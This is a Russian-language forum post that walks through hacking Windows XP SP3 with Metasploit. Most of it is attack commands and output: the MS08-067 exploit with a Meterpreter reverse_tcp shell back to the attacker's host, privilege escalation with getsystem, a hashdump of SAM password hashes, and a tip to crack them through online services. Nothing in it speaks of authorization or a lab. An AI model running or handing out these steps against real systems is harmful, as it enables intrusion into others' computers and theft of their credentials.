Объявление

Свернуть
Пока нет объявлений.

Взлом используем Metasploit Framework

Свернуть
X
 
  • Фильтр
  • Время
  • Показать
Очистить всё
новые сообщения

  • Взлом используем Metasploit Framework

    Metasploit Framework – бесплатный (открытый исходный код) пен-тест framework созданный H. D. Moore в 2003 год

    Metasploit обладает крупнейшими базами данных эксплоитов и принимает около миллиона загрузок каждый год.

    Уязвимость (Vulnerability) – слабое место, которое позволяет злоумышленнику/пен-тестеру взламывать/скомпрометировать целевую систему. Уязвимость может существовать в операционных системах, программах, службах и т.д.

    Эксплоит (Exploit) – код с помощью которого злоумышленник/пен-тестер может взломать систему, программу и т.п. Каждая уязвимость имеет свой собственный соответствующий эксплойт. Metasploit v4 имеет более чем 700 эксплоитов.

    Payload – код, который выполняется после эксплоита. В основном используется для настройки связи между жертвой и атакующим. Metasploit v4 имеет более 250 payloads.

    Модуль (Module) – это небольшие строительные блоки. Каждый модуль выполняет определенную задачу и система создается/строится путем объединения этих блоков в единое целое. Самым большим преимуществом такой архитектуры является то, что она легка для интеграции новых эксплоитов.

    www.metasploit.com

    Заинтересовались ? Или думаете что в нем интересного ?
    Ну, тогда для разогрева, покажу Вам как можно взломать Windows XP SP3

    Для начала обновим Metasploit:

    Код:
    # msfupdate
    Запускаем Metasploit:

    Код:
    # msfconsole
    Вводим команды:

    Код:
    > use windows/smb/ms08_067_netapi
    > set rhost 192.168.1.4
    > set rport 445
    > set lhost 192.168.1.5
    > set lport 4444
    > set payload windows/meterpreter/reverse_tcp
    rhost – IP-адрес удаленного пользователя (remote host)
    rport – порт удаленного пользователя (remote port)
    lhost – IP-адрес атакующего (local host)
    lport – порт атакующего (local port)

    Проверяем все ли опции заданы:

    Код:
    > show options
    Убеждаемся, что все в порядке.

    Код:
    ms08_067_netapi_show_opt_orig
    Теперь запускаем эксплоит:

    Код:
    > exploit
    ms08_067_netapi_exploit_orig
    Отлично! Мы в системе.

    Посмотрим, какими правами мы обладаем, но скорее всего у нас будут права SYSTEM:

    Код:
    meterpreter > getuid
    Server username: NT AUTHORITY/SYSTEM

    Иногда бывает, что у атакующего не хватает прав на совершение какого то действия, т.е. он работает под ограниченной учетной записью. И соответственно вылетают такие ошибки, как:
    Код:
    meterpreter > hashdump
    [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
    Мы можем попробовать поднять наши права в системе командой getsystem:

    Код:
    meterpreter > getsystem
    ...got system (via technique 1).
    Код:
    meterpreter > getuid
    Server username: NT AUTHORITY/SYSTEM

    Хорошо, теперь можем делать все что вздумается, но так как мы говорим про удаленный взлом пароля Windows XP, то будем придерживаться плана.

    Сейчас нам нужно вывести содержимое базы данных SAM. Для этого воспользуемся командой hashdump:

    Код:
    meterpreter > hashdump
    Admin:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
    HelpAssistant:1000:635e6894ad2400afc97d6c747dc0976a:c489103aa4919d38017486860a7e0b2d:::
    Hub-lex:1004:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2a6f7ec01c389c27cb4db76b7b0de220:::
    Гость:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Код:
    Синтаксис вывода такой: <User_Name>:<User_ID>:<LM Hash>:<NT Hash>:::
    Чтобы расшифровать хэшы можно воспользоваться многочисленными онлайн сервисами, например cmd5.ru.
Обработка...
X